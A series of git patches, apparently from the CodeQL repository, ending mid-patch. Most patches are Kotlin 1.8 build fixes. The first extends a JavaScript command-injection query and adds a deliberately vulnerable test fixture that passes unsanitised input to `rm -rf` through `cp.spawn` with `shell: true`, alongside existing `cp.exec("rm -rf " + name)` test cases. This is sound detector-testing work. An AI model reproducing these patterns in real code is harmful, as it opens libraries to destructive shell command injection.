UnsafeShellCommandConstruction { .asExpr() .(BooleanLiteral) .getValue() = "true" + or + exists(API::Node node | + node.asSink() = sys.getOptionsArg() and + node.getMember("shell").getAValueReachingSink().mayHaveBooleanValue(true) + ) } /** diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.expected b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.expected index de11fb884c9..92cca128c59 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.expected +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.expected @@ -282,6 +282,14 @@ nodes | lib/lib.js:543:23:543:26 | name | | lib/lib.js:545:23:545:26 | name | | lib/lib.js:545:23:545:26 | name | +| lib/lib.js:550:39:550:42 | name | +| lib/lib.js:550:39:550:42 | name | +| lib/lib.js:551:33:551:36 | args | +| lib/lib.js:552:23:552:26 | args | +| lib/lib.js:552:23:552:26 | args | +| lib/lib.js:555:25:555:37 | ["-rf", name] | +| lib/lib.js:555:33:555:36 | name | +| lib/lib.js:555:33:555:36 | name | | lib/subLib2/compiled-file.ts:3:26:3:29 | name | | lib/subLib2/compiled-file.ts:3:26:3:29 | name | | lib/subLib2/compiled-file.ts:4:25:4:28 | name | @@ -659,6 +667,14 @@ edges | lib/lib.js:509:39:509:42 | name | lib/lib.js:545:23:545:26 | name | | lib/lib.js:509:39:509:42 | name | lib/lib.js:545:23:545:26 | name | | lib/lib.js:509:39:509:42 | name | lib/lib.js:545:23:545:26 | name | +| lib/lib.js:550:39:550:42 | name | lib/lib.js:555:33:555:36 | name | +| lib/lib.js:550:39:550:42 | name | lib/lib.js:555:33:555:36 | name | +| lib/lib.js:550:39:550:42 | name | lib/lib.js:555:33:555:36 | name | +| lib/lib.js:550:39:550:42 | name | lib/lib.js:555:33:555:36 | name | +| lib/lib.js:551:33:551:36 | args | lib/lib.js:552:23:552:26 | args | +| lib/lib.js:551:33:551:36 | args | lib/lib.js:552:23:552:26 | args | +| lib/lib.js:555:25:555:37 | ["-rf", name] | lib/lib.js:551:33:551:36 | args | +| lib/lib.js:555:33:555:36 | name | lib/lib.js:555:25:555:37 | ["-rf", name] | | lib/subLib2/compiled-file.ts:3:26:3:29 | name | lib/subLib2/compiled-file.ts:4:25:4:28 | name | | lib/subLib2/compiled-file.ts:3:26:3:29 | name | lib/subLib2/compiled-file.ts:4:25:4:28 | name | | lib/subLib2/compiled-file.ts:3:26:3:29 | name | lib/subLib2/compiled-file.ts:4:25:4:28 | name | @@ -775,6 +791,8 @@ edges | lib/lib.js:537:11:537:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:537:23:537:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:537:3:537:27 | cp.exec ... + name) | shell command | | lib/lib.js:543:11:543:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:543:23:543:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:543:3:543:27 | cp.exec ... + name) | shell command | | lib/lib.js:545:11:545:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:545:23:545:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:545:3:545:27 | cp.exec ... + name) | shell command | +| lib/lib.js:552:23:552:26 | args | lib/lib.js:550:39:550:42 | name | lib/lib.js:552:23:552:26 | args | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:550:39:550:42 | name | library input | lib/lib.js:552:9:552:38 | cp.spaw ... wnOpts) | shell command | +| lib/lib.js:555:33:555:36 | name | lib/lib.js:550:39:550:42 | name | lib/lib.js:555:33:555:36 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:550:39:550:42 | name | library input | lib/lib.js:552:9:552:38 | cp.spaw ... wnOpts) | shell command | | lib/subLib2/compiled-file.ts:4:13:4:28 | "rm -rf " + name | lib/subLib2/compiled-file.ts:3:26:3:29 | name | lib/subLib2/compiled-file.ts:4:25:4:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib2/compiled-file.ts:3:26:3:29 | name | library input | lib/subLib2/compiled-file.ts:4:5:4:29 | cp.exec ... + name) | shell command | | lib/subLib2/special-file.js:4:10:4:25 | "rm -rf " + name | lib/subLib2/special-file.js:3:28:3:31 | name | lib/subLib2/special-file.js:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib2/special-file.js:3:28:3:31 | name | library input | lib/subLib2/special-file.js:4:2:4:26 | cp.exec ... + name) | shell command | | lib/subLib3/my-file.ts:4:10:4:25 | "rm -rf " + name | lib/subLib3/my-file.ts:3:28:3:31 | name | lib/subLib3/my-file.ts:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib3/my-file.ts:3:28:3:31 | name | library input | lib/subLib3/my-file.ts:4:2:4:26 | cp.exec ... + name) | shell command | diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js index 64b279d7d05..728ddbfa91e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js @@ -545,3 +545,12 @@ module.exports.sanitizer4 = function (name) { cp.exec("rm -rf " + name); // NOT OK } } + + +module.exports.shellThing = function (name) { + function indirectShell(cmd, args, spawnOpts) { + cp.spawn(cmd, args, spawnOpts); // NOT OK + } + + indirectShell("rm", ["-rf", name], {shell: true}); +} \ No newline at end of file From 43696f5e27db5495d35259099c0a3328e7953a56 Mon Sep 17 00:00:00 2001 From: erik-krogh Date: Tue, 10 Jan 2023 10:24:19 +0100 Subject: [PATCH 153/381] add explicit this --- javascript/ql/lib/semmle/javascript/ApiGraphs.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/lib/semmle/javascript/ApiGraphs.qll b/javascript/ql/lib/semmle/javascript/ApiGraphs.qll index a9c8bca2345..80a5487943a 100644 --- a/javascript/ql/lib/semmle/javascript/ApiGraphs.qll +++ b/javascript/ql/lib/semmle/javascript/ApiGraphs.qll @@ -214,7 +214,7 @@ module API { result = Impl::trackDefNode(this.asSink()) or // in case `asSink()` is not a `SourceNode`. - result = asSink() + result = this.asSink() } /** DEPRECATED. This predicate has been renamed to `asSink`. */ From f7d8d16ed3fc3e5c673d547f6866aab9faaf74ad Mon Sep 17 00:00:00 2001 From: Ian Lynagh Date: Mon, 21 Nov 2022 19:56:22 +0000 Subject: [PATCH 154/381] Kotlin: Fix build for 1.8.0-Beta The build no longer works for Kotlin < 1.8: We get error: class 'org.jetbrains.kotlin.ir.IrElement' was compiled with an incompatible version of Kotlin. The binary version of its metadata is 1.8.0, expected version is 1.6.0. --- .../kotlin_plugin_versions.py | 2 +- .../KotlinExtractorCommandLineProcessor.kt | 2 ++ .../KotlinExtractorComponentRegistrar.kt | 5 +++ .../src/main/kotlin/KotlinFileExtractor.kt | 8 +++-- .../src/main/kotlin/KotlinUsesExtractor.kt | 10 +++--- .../src/main/kotlin/PrimitiveTypeInfo.kt | 3 +- .../src/main/kotlin/utils/GetByFqName.kt | 33 +++++++++++++++++++ .../v_1_4_32/ExperimentalCompilerApi.kt | 4 +++ .../v_1_4_32/FirIncompatiblePluginAPI.kt | 5 +++ .../v_1_8_0-Beta/ExperimentalCompilerApi.kt | 4 +++ .../v_1_8_0-Beta/FirIncompatiblePluginAPI.kt | 4 +++ 11 files changed, 71 insertions(+), 9 deletions(-) create mode 100644 java/kotlin-extractor/src/main/kotlin/utils/GetByFqName.kt create mode 100644 java/kotlin-extractor/src/main/kotlin/utils/versions/v_1_4_32/ExperimentalCompilerApi.kt create mode 100644 java/kotlin-extractor/src/main/kotlin/utils/versions/v_1_4_32/FirIncompatiblePluginAPI.kt create mode 100644 java/kotlin-extractor/src/main/kotlin/utils/versions/v_1_8_0-Beta/ExperimentalCompilerApi.kt create mode 100644 java/kotlin-extractor/src/main/kotlin/utils/versions/v_1_8_0-Beta/FirIncompatiblePluginAPI.kt diff --git a/java/kotlin-extractor/kotlin_plugin_versions.py b/java/kotlin-extractor/kotlin_plugin_versions.py index 99691b89fd2..1081883479c 100755 --- a/java/kotlin-extractor/kotlin_plugin_versions.py +++ b/java/kotlin-extractor/kotlin_plugin_versions.py @@ -25,7 +25,7 @@ def version_string_to_tuple(version): ci_version = '1.7.20' # Version numbers in the list need to be in semantically increasing order -many_versions = [ '1.4.32', '1.5.0', '1.5.10', '1.5.20', '1.5.30', '1.6.0', '1.6.20', '1.7.0', '1.7.20' ] +many_versions = [ '1.4.32', '1.5.0', '1.5.10', '1.5.20', '1.5.30', '1.6.0', '1.6.20', '1.7.0', '1.7.20', '1.8.0-Beta' ] many_versions_tuples = [version_string_to_tuple(v) for v in many_versions] diff --git a/java/kotlin-extractor/src/main/kotlin/KotlinExtractorCommandLineProcessor.kt b/java/kotlin-extractor/src/main/kotlin/KotlinExtractorCommandLineProcessor.kt index 5c29d6af54e..f110d48231f 100644 --- a/java/kotlin-extractor/src/main/kotlin/KotlinExtractorCommandLineProcessor.kt +++ b/java/kotlin-extractor/src/main/kotlin/KotlinExtractorCommandLineProcessor.kt @@ -3,9 +3,11 @@ package com.github.codeql import org.jetbrains.kotlin.compiler.plugin.AbstractCliOption import org.jetbrains.kotlin.compiler.plugin.CliOption import org.jetbrains.kotlin.compiler.plugin.CommandLineProcessor +import org.jetbrains.kotlin.compiler.plugin.ExperimentalCompilerApi import org.jetbrains.kotlin.config.CompilerConfiguration import org.jetbrains.kotlin.config.CompilerConfigurationKey +@OptIn(ExperimentalCompilerApi::class) class KotlinExtractorCommandLineProcessor : CommandLineProcessor { override val pluginId = "kotlin-extractor" diff --git a/java/kotlin-extractor/src/main/kotlin/KotlinExtractorComponentRegistrar.kt b/java/kotlin-extractor/src/main/kotlin/KotlinExtractorComponentRegistrar.kt index daee156d58c..f2f22390eb3 100644 --- a/java/kotlin-extractor/src/main/kotlin/KotlinExtractorComponentRegistrar.kt +++ b/java/kotlin-extractor/src/main/kotlin/KotlinExtractorComponentRegistrar.kt @@ -1,10 +1,15 @@ +// For ComponentRegistrar +@file:Suppress("DEPRECATION") + package com.github.codeql import org.jetbrains.kotlin.backend.common.extensions.IrGenerationExtension +import org.jetbrains.kotlin.compiler.plugin.ExperimentalCompilerApi import com.intellij.mock.MockProject import org.jetbrains.kotlin.compiler.plugin.ComponentRegistrar import org.jetbrains.kotlin.config.CompilerConfiguration +@OptIn(ExperimentalCompilerApi::class) class KotlinExtractorComponentRegistrar : ComponentRegistrar { override fun registerProjectComponents( project: MockProject, diff --git a/java/kotlin-extractor/src/main/kotlin/KotlinFileExtractor.kt b/java/kotlin-extractor/src/main/kotlin/KotlinFileExtractor.kt index 5990fb3389d..99eacabb25e 100644 --- a/java/kotlin-extractor/src/main/kotlin/KotlinFileExtractor.kt +++ b/java/kotlin-extractor/src/main/kotlin/KotlinFileExtractor.kt @@ -1709,6 +1709,10 @@ open class KotlinFileExtractor( when (b.kind) { IrSyntheticBodyKind.ENUM_VALUES -> tw.writeKtSyntheticBody(callable, 1) IrSyntheticBodyKind.ENUM_VALUEOF -> tw.writeKtSyntheticBody(callable, 2) + else -> { + // TODO: Support IrSyntheticBodyKind.ENUM_ENTRIES + logger.errorElement("Unhandled synthetic body kind " + b.kind.javaClass, b) + } } } } @@ -2400,7 +2404,7 @@ open class KotlinFileExtractor( private fun findTopLevelFunctionOrWarn(functionFilter: String, type: String, parameterTypes: Array, warnAgainstElement: IrElement): IrFunction? { - val fn = pluginContext.referenceFunctions(FqName(functionFilter)) + val fn = getFunctionsByFqName(pluginContext, functionFilter) .firstOrNull { fnSymbol -> fnSymbol.owner.parentClassOrNull?.fqNameWhenAvailable?.asString() == type && fnSymbol.owner.valueParameters.map { it.type.classFqName?.asString() }.toTypedArray() contentEquals parameterTypes @@ -2419,7 +2423,7 @@ open class KotlinFileExtractor( private fun findTopLevelPropertyOrWarn(propertyFilter: String, type: String, warnAgainstElement: IrElement): IrProperty? { - val prop = pluginContext.referenceProperties(FqName(propertyFilter)) + val prop = getPropertiesByFqName(pluginContext, propertyFilter) .firstOrNull { it.owner.parentClassOrNull?.fqNameWhenAvailable?.asString() == type } ?.owner diff --git a/java/kotlin-extractor/src/main/kotlin/KotlinUsesExtractor.kt b/java/kotlin-extractor/src/main/kotlin/KotlinUsesExtractor.kt index fe55fdba256..92fc961dd0f 100644 --- a/java/kotlin-extractor/src/main/kotlin/KotlinUsesExtractor.kt +++ b/java/kotlin-extractor/src/main/kotlin/KotlinUsesExtractor.kt @@ -41,7 +41,7 @@ open class KotlinUsesExtractor( val globalExtensionState: KotlinExtractorGlobalState ) { fun referenceExternalClass(name: String) = - pluginContext.referenceClass(FqName(name))?.owner.also { + getClassByFqName(pluginContext, FqName(name))?.owner.also { if (it == null) logger.warn("Unable to resolve external class $name") else @@ -118,7 +118,7 @@ open class KotlinUsesExtractor( } fun getJavaEquivalentClass(c: IrClass) = - getJavaEquivalentClassId(c)?.let { pluginContext.referenceClass(it.asSingleFqName()) }?.owner + getJavaEquivalentClassId(c)?.let { getClassByFqName(pluginContext, it.asSingleFqName()) }?.owner /** * Gets a KotlinFileExtractor based on this one, except it attributes locations to the file that declares the given class. @@ -328,7 +328,7 @@ open class KotlinUsesExtractor( return@getOrPut null } - val result = pluginContext.referenceClass(qualifiedName)?.owner + val result = getClassByFqName(pluginContext, qualifiedName)?.owner if (result != null) { logger.info("Replaced synthetic class ${c.name} with its real equivalent") return@getOrPut result @@ -337,7 +337,7 @@ open class KotlinUsesExtractor( // The above doesn't work for (some) generated nested classes, such as R$id, which should be R.id val fqn = qualifiedName.asString() if (fqn.indexOf('$') >= 0) { - val nested = pluginContext.referenceClass(FqName(fqn.replace('$', '.')))?.owner + val nested = getClassByFqName(pluginContext, fqn.replace('$', '.'))?.owner if (nested != null) { logger.info("Replaced synthetic nested class ${c.name} with its real equivalent") return@getOrPut nested @@ -454,7 +454,7 @@ open class KotlinUsesExtractor( } fun tryGetPair(arity: Int): Pair?>? { - val replaced = pluginContext.referenceClass(fqName)?.owner ?: return null + val replaced = getClassByFqName(pluginContext, fqName)?.owner ?: return null return Pair(replaced, List(arity) { makeTypeProjection(pluginContext.irBuiltIns.anyNType, Variance.INVARIANT) }) } diff --git a/java/kotlin-extractor/src/main/kotlin/PrimitiveTypeInfo.kt b/java/kotlin-extractor/src/main/kotlin/PrimitiveTypeInfo.kt index 8d844a65ec8..a14b0c138db 100644 --- a/java/kotlin-extractor/src/main/kotlin/PrimitiveTypeInfo.kt +++ b/java/kotlin-extractor/src/main/kotlin/PrimitiveTypeInfo.kt @@ -7,6 +7,7 @@ import org.jetbrains.kotlin.ir.declarations.IrPackageFragment import org.jetbrains.kotlin.ir.types.IrSimpleType import org.jetbrains.kotlin.ir.types.classOrNull import org.jetbrains.kotlin.name.FqName +import com.github.codeql.utils.* class PrimitiveTypeMapping(val logger: Logger, val pluginContext: IrPluginContext) { fun getPrimitiveInfo(s: IrSimpleType) = @@ -25,7 +26,7 @@ class PrimitiveTypeMapping(val logger: Logger, val pluginContext: IrPluginContex ) private fun findClass(fqName: String, fallback: IrClass): IrClass { - val symbol = pluginContext.referenceClass(FqName(fqName)) + val symbol = getClassByFqName(pluginContext, fqName) if(symbol == null) { logger.warn("Can't find $fqName") // Do the best we can diff --git a/java/kotlin-extractor/src/main/kotlin/utils/GetByFqName.kt b/java/kotlin-extractor/src/main/kotlin/utils/GetByFqName.kt new file mode 100644 index 00000000000..0d1b63bf0f2 --- /dev/null +++ b/java/kotlin-extractor/src/main/kotlin/utils/GetByFqName.kt @@ -0,0 +1,33 @@ +package com.github.codeql.utils + +import org.jetbrains.kotlin.backend.common.extensions.FirIncompatiblePluginAPI +import org.jetbrains.kotlin.backend.common.extensions.IrPluginContext +import org.jetbrains.kotlin.ir.symbols.* +import org.jetbrains.kotlin.name.FqName + +fun getClassByFqName(pluginContext: IrPluginContext, fqName: String): IrClassSymbol? { + return getClassByFqName(pluginContext, FqName(fqName)) +} + +fun getClassByFqName(pluginContext: IrPluginContext, fqName: FqName): IrClassSymbol? { + @OptIn(FirIncompatiblePluginAPI::class) + return pluginContext.referenceClass(fqName) +} + +fun getFunctionsByFqName(pluginContext: IrPluginContext, fqName: String): Collection { + return getFunctionsByFqName(pluginContext, FqName(fqName)) +} + +fun getFunctionsByFqName(pluginContext: IrPluginContext, fqName: FqName): Collection { + @OptIn(FirIncompatiblePluginAPI::class) + return pluginContext.referenceFunctions(fqName) +} + +fun getPropertiesByFqName(pluginContext: IrPluginContext, fqName: String): Collection { + return getPropertiesByFqName(pluginContext, FqName(fqName)) +} + +fun getPropertiesByFqName(pluginContext: IrPluginContext, fqName: FqName): Collection { + @OptIn(FirIncompatiblePluginAPI::class) + return pluginContext.referenceProperties(fqName) +} diff --git a/java/kotlin-extractor/src/main/kotlin/utils/versions/v_1_4_32/ExperimentalCompilerApi.kt b/java/kotlin-extractor/src/main/kotlin/utils/versions/v_1_4_32/ExperimentalCompilerApi.kt new file mode 100644 index 00000000000..9b40a26bc51 --- /dev/null +++ b/java/kotlin-extractor/src/main/kotlin/utils/versions/v_1_4_32/ExperimentalCompilerApi.kt @@ -0,0 +1,4 @@ +package org.jetbrains.kotlin.compiler.plugin + +@RequiresOptIn("This API is experimental. There are no stability guarantees for it") +annotation class ExperimentalCompilerApi diff --git a/java/kotlin-extractor/src/main/kotlin/utils/versions/v_1_4_32/FirIncompatiblePluginAPI.kt b/java/kotlin-extractor/src/main/kotlin/utils/versions/v_1_4_32/FirIncompatiblePluginAPI.kt new file mode 100644 index 00000000000..45d573da9c7 --- /dev/null +++ b/java/kotlin-extractor/src/main/kotlin/utils/versions/v_1_4_32/FirIncompatiblePluginAPI.kt @@ -0,0 +1,5 @@ +package org.jetbrains.kotlin.backend.common.extensions + +@RequiresOptIn("This API is not available after FIR") +annotation class FirIncompatiblePluginAPI + diff --git a/java/kotlin-extractor/src/main/kotlin/utils/versions/v_1_8_0-Beta/ExperimentalCompilerApi.kt b/java/kotlin-extractor/src/main/kotlin/utils/versions/v_1_8_0-Beta/ExperimentalCompilerApi.kt new file mode 100644 index 00000000000..48829cc30c5 --- /dev/null +++ b/java/kotlin-extractor/src/main/kotlin/utils/versions/v_1_8_0-Beta/ExperimentalCompilerApi.kt @@ -0,0 +1,4 @@ +package com.github.codeql + +// The compiler provides the annotation class, so we don't need to do +// anything diff --git a/java/kotlin-extractor/src/main/kotlin/utils/versions/v_1_8_0-Beta/FirIncompatiblePluginAPI.kt b/java/kotlin-extractor/src/main/kotlin/utils/versions/v_1_8_0-Beta/FirIncompatiblePluginAPI.kt new file mode 100644 index 00000000000..48829cc30c5 --- /dev/null +++ b/java/kotlin-extractor/src/main/kotlin/utils/versions/v_1_8_0-Beta/FirIncompatiblePluginAPI.kt @@ -0,0 +1,4 @@ +package com.github.codeql + +// The compiler provides the annotation class, so we don't need to do +// anything From 6fbda1a9f0c2d8e9e5184932df483ef851792438 Mon Sep 17 00:00:00 2001 From: Ian Lynagh Date: Thu, 8 Dec 2022 19:19:16 +0000 Subject: [PATCH 155/381] Kotlin: Accept test changes with 1.8 --- java/ql/test/kotlin/library-tests/enum/test.expected | 5 +++++ .../library-tests/java-lang-number-conversions/test.expected | 1 + .../test/kotlin/library-tests/reflection/reflection.expected | 5 +++++ 3 files changed, 11 insertions(+) diff --git a/java/ql/test/kotlin/library-tests/enum/test.expected b/java/ql/test/kotlin/library-tests/enum/test.expected index abc7e2e87c7..2484ff2e2ba 100644 --- a/java/ql/test/kotlin/library-tests/enum/test.expected +++ b/java/ql/test/kotlin/library-tests/enum/test.expected @@ -15,6 +15,7 @@ enumConstants | describeConstable | | equals | | finalize | +| forEach | | getDeclaringClass | | hasMoreElements | | hashCode | @@ -23,8 +24,12 @@ enumConstants | noneOf | | of | | ordinal | +| parallelStream | | range | | resolveConstantDesc | +| spliterator | +| stream | +| toArray | | toString | | typeCheck | | usesEnum | diff --git a/java/ql/test/kotlin/library-tests/java-lang-number-conversions/test.expected b/java/ql/test/kotlin/library-tests/java-lang-number-conversions/test.expected index 52ed7b2ccfe..993ddb13e55 100644 --- a/java/ql/test/kotlin/library-tests/java-lang-number-conversions/test.expected +++ b/java/ql/test/kotlin/library-tests/java-lang-number-conversions/test.expected @@ -36,6 +36,7 @@ | kotlin.Byte | minus | | kotlin.Byte | plus | | kotlin.Byte | rangeTo | +| kotlin.Byte | rangeUntil | | kotlin.Byte | rem | | kotlin.Byte | shortValue | | kotlin.Byte | times | diff --git a/java/ql/test/kotlin/library-tests/reflection/reflection.expected b/java/ql/test/kotlin/library-tests/reflection/reflection.expected index f2482a81ec1..d149bd24563 100644 --- a/java/ql/test/kotlin/library-tests/reflection/reflection.expected +++ b/java/ql/test/kotlin/library-tests/reflection/reflection.expected @@ -269,6 +269,11 @@ compGenerated | file:///CharRange.class:0:0:0:0 | spliterator | Forwarder for a Kotlin class inheriting an interface default method | | file:///Class2.class:0:0:0:0 | getValue | Default property accessor | | file:///Class2.class:0:0:0:0 | getValue | Default property accessor | +| file:///EnumEntries.class:0:0:0:0 | forEach | Forwarder for a Kotlin class inheriting an interface default method | +| file:///EnumEntries.class:0:0:0:0 | parallelStream | Forwarder for a Kotlin class inheriting an interface default method | +| file:///EnumEntries.class:0:0:0:0 | spliterator | Forwarder for a Kotlin class inheriting an interface default method | +| file:///EnumEntries.class:0:0:0:0 | stream | Forwarder for a Kotlin class inheriting an interface default method | +| file:///EnumEntries.class:0:0:0:0 | toArray | Forwarder for a Kotlin class inheriting an interface default method | | file:///IntProgression.class:0:0:0:0 | forEach | Forwarder for a Kotlin class inheriting an interface default method | | file:///IntProgression.class:0:0:0:0 | spliterator | Forwarder for a Kotlin class inheriting an interface default method | | file:///IntRange.class:0:0:0:0 | forEach | Forwarder for a Kotlin class inheriting an interface default method | From b51c3aae85510def6a659b9585240e80e680d917 Mon Sep 17 00:00:00 2001 From: Ian Lynagh Date: Thu, 8 Dec 2022 19:19:39 +0000 Subject: [PATCH 156/381] Kotlin: Logs test: Allow for -Beta versions etc when parsing the logs --- .../integration-tests/all-platforms/kotlin/logs/index_logs.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/java/ql/integration-tests/all-platforms/kotlin/logs/index_logs.py b/java/ql/integration-tests/all-platforms/kotlin/logs/index_logs.py index a02c8b3f75a..9aa6ad13863 100644 --- a/java/ql/integration-tests/all-platforms/kotlin/logs/index_logs.py +++ b/java/ql/integration-tests/all-platforms/kotlin/logs/index_logs.py @@ -32,7 +32,7 @@ with open('logs.csv', 'w', newline='') as f_out: j = json.loads(line) msg = j['message'] msg = re.sub(r'(?<=Extraction for invocation TRAP file ).*[\\/]kt-db[\\/]trap[\\/]java[\\/]invocations[\\/]kotlin\..*\.trap', '', msg) - msg = re.sub('(?<=Kotlin version )[0-9.]+', '', msg) + msg = re.sub('(?<=Kotlin version )[0-9.]+(-[a-zA-Z0-9.]+)?', '', msg) if msg.startswith('Peak memory: '): # Peak memory information varies from run to run, so just ignore it continue From 89b33637612c64b2af3dfd074576ac65c203f55d Mon Sep 17 00:00:00 2001 From: Ian Lynagh Date: Thu, 8 Dec 2022 19:20:22 +0000 Subject: [PATCH 157/381] Kotlin: Bump CI version to 1.8.0-Beta --- java/kotlin-extractor/kotlin_plugin_versions.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/java/kotlin-extractor/kotlin_plugin_versions.py b/java/kotlin-extractor/kotlin_plugin_versions.py index 1081883479c..b3f9cfd1812 100755 --- a/java/kotlin-extractor/kotlin_plugin_versions.py +++ b/java/kotlin-extractor/kotlin_plugin_versions.py @@ -22,7 +22,7 @@ def version_string_to_tuple(version): return tuple([int(m.group(i)) for i in range(1, 4)] + [m.group(4)]) # Version number used by CI. It needs to be one of the versions in many_versions. -ci_version = '1.7.20' +ci_version = '1.8.0-Beta' # Version numbers in the list need to be in semantically increasing order many_versions = [ '1.4.32', '1.5.0', '1.5.10', '1.5.20', '1.5.30', '1.6.0', '1.6.20', '1.7.0', '1.7.20', '1.8.0-Beta' ] From c4119761cc2f56d673edbb94814a75707f0f0c1c Mon Sep 17 00:00:00 2001 From: Ian Lynagh Date: Mon, 9 Jan 2023 19:39:34 +0000 Subject: [PATCH 158/381] Kotlin: Another 1.8 build fix --- java/kotlin-extractor/src/main/kotlin/KotlinFileExtractor.kt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/java/kotlin-extractor/src/main/kotlin/KotlinFileExtractor.kt b/java/kotlin-extractor/src/main/kotlin/KotlinFileExtractor.kt index 99eacabb25e..793d7b15b6f 100644 --- a/java/kotlin-extractor/src/main/kotlin/KotlinFileExtractor.kt +++ b/java/kotlin-extractor/src/main/kotlin/KotlinFileExtractor.kt @@ -1387,7 +1387,7 @@ open class KotlinFileExtractor( private fun getNullabilityAnnotation(t: IrType, declOrigin: IrDeclarationOrigin, existingAnnotations: List, javaAnnotations: Collection?) = getNullabilityAnnotationName(t, declOrigin, existingAnnotations, javaAnnotations)?.let { - pluginContext.referenceClass(it)?.let { annotationClass -> + getClassByFqName(pluginContext, it)?.let { annotationClass -> annotationClass.owner.declarations.firstIsInstanceOrNull()?.let { annotationConstructor -> IrConstructorCallImpl.fromSymbolOwner( UNDEFINED_OFFSET, UNDEFINED_OFFSET, annotationConstructor.returnType, annotationConstructor.symbol, 0 From 20b35e5d02e1a8432d28ff43442cf75033a8326e Mon Sep 17 00:00:00 2001 From: Ian Lynagh Date: Mon, 9 Jan 2023 19:52:31 +0000 Subject: [PATCH 159/381] Kotlin: 1.8.0 changes --- docs/codeql/reusables/supported-versions-compilers.rst | 2 +- java/kotlin-extractor/build.gradle | 3 +++ java/kotlin-extractor/kotlin_plugin_versions.py | 4 ++-- .../{v_1_8_0-Beta => v_1_8_0}/ExperimentalCompilerApi.kt | 0 .../{v_1_8_0-Beta => v_1_8_0}/FirIncompatiblePluginAPI.kt | 0 5 files changed, 6 insertions(+), 3 deletions(-) rename java/kotlin-extractor/src/main/kotlin/utils/versions/{v_1_8_0-Beta => v_1_8_0}/ExperimentalCompilerApi.kt (100%) rename java/kotlin-extractor/src/main/kotlin/utils/versions/{v_1_8_0-Beta => v_1_8_0}/FirIncompatiblePluginAPI.kt (100%) diff --git a/docs/codeql/reusables/supported-versions-compilers.rst b/docs/codeql/reusables/supported-versions-compilers.rst index 85a650ed17a..c9b38fc4c19 100644 --- a/docs/codeql/reusables/supported-versions-compilers.rst +++ b/docs/codeql/reusables/supported-versions-compilers.rst @@ -20,7 +20,7 @@ Java,"Java 7 to 18 [4]_","javac (OpenJDK and Oracle JDK), Eclipse compiler for Java (ECJ) [5]_",``.java`` - Kotlin [6]_,"Kotlin 1.5.0 to 1.7.21","kotlinc",``.kt`` + Kotlin [6]_,"Kotlin 1.5.0 to 1.8.0","kotlinc",``.kt`` JavaScript,ECMAScript 2022 or lower,Not applicable,"``.js``, ``.jsx``, ``.mjs``, ``.es``, ``.es6``, ``.htm``, ``.html``, ``.xhtm``, ``.xhtml``, ``.vue``, ``.hbs``, ``.ejs``, ``.njk``, ``.json``, ``.yaml``, ``.yml``, ``.raml``, ``.xml`` [7]_" Python [8]_,"2.7, 3.5, 3.6, 3.7, 3.8, 3.9, 3.10",Not applicable,``.py`` Ruby [9]_,"up to 3.1",Not applicable,"``.rb``, ``.erb``, ``.gemspec``, ``Gemfile``" diff --git a/java/kotlin-extractor/build.gradle b/java/kotlin-extractor/build.gradle index 7859a2c4c08..57229642a92 100644 --- a/java/kotlin-extractor/build.gradle +++ b/java/kotlin-extractor/build.gradle @@ -46,6 +46,9 @@ sourceSets { "utils/versions/v_1_7_20-Beta/createImplicitParameterDeclarationWithWrappedDescriptor.kt", "utils/versions/v_1_7_20-Beta/allOverriddenIncludingSelf.kt", + + "utils/versions/v_1_8_0/ExperimentalCompilerApi.kt", + "utils/versions/v_1_8_0/FirIncompatiblePluginAPI.kt", ] } } diff --git a/java/kotlin-extractor/kotlin_plugin_versions.py b/java/kotlin-extractor/kotlin_plugin_versions.py index b3f9cfd1812..8d08c75803e 100755 --- a/java/kotlin-extractor/kotlin_plugin_versions.py +++ b/java/kotlin-extractor/kotlin_plugin_versions.py @@ -22,10 +22,10 @@ def version_string_to_tuple(version): return tuple([int(m.group(i)) for i in range(1, 4)] + [m.group(4)]) # Version number used by CI. It needs to be one of the versions in many_versions. -ci_version = '1.8.0-Beta' +ci_version = '1.8.0' # Version numbers in the list need to be in semantically increasing order -many_versions = [ '1.4.32', '1.5.0', '1.5.10', '1.5.20', '1.5.30', '1.6.0', '1.6.20', '1.7.0', '1.7.20', '1.8.0-Beta' ] +many_versions = [ '1.4.32', '1.5.0', '1.5.10', '1.5.20', '1.5.30', '1.6.0', '1.6.20', '1.7.0', '1.7.20', '1.8.0' ] many_versions_tuples = [version_string_to_tuple(v) for v in many_versions] diff --git a/java/kotlin-extractor/src/main/kotlin/utils/versions/v_1_8_0-Beta/ExperimentalCompilerApi.kt b/java/kotlin-extractor/src/main/kotlin/utils/versions/v_1_8_0/ExperimentalCompilerApi.kt similarity index 100% rename from java/kotlin-extractor/src/main/kotlin/utils/versions/v_1_8_0-Beta/ExperimentalCompilerApi.kt rename to 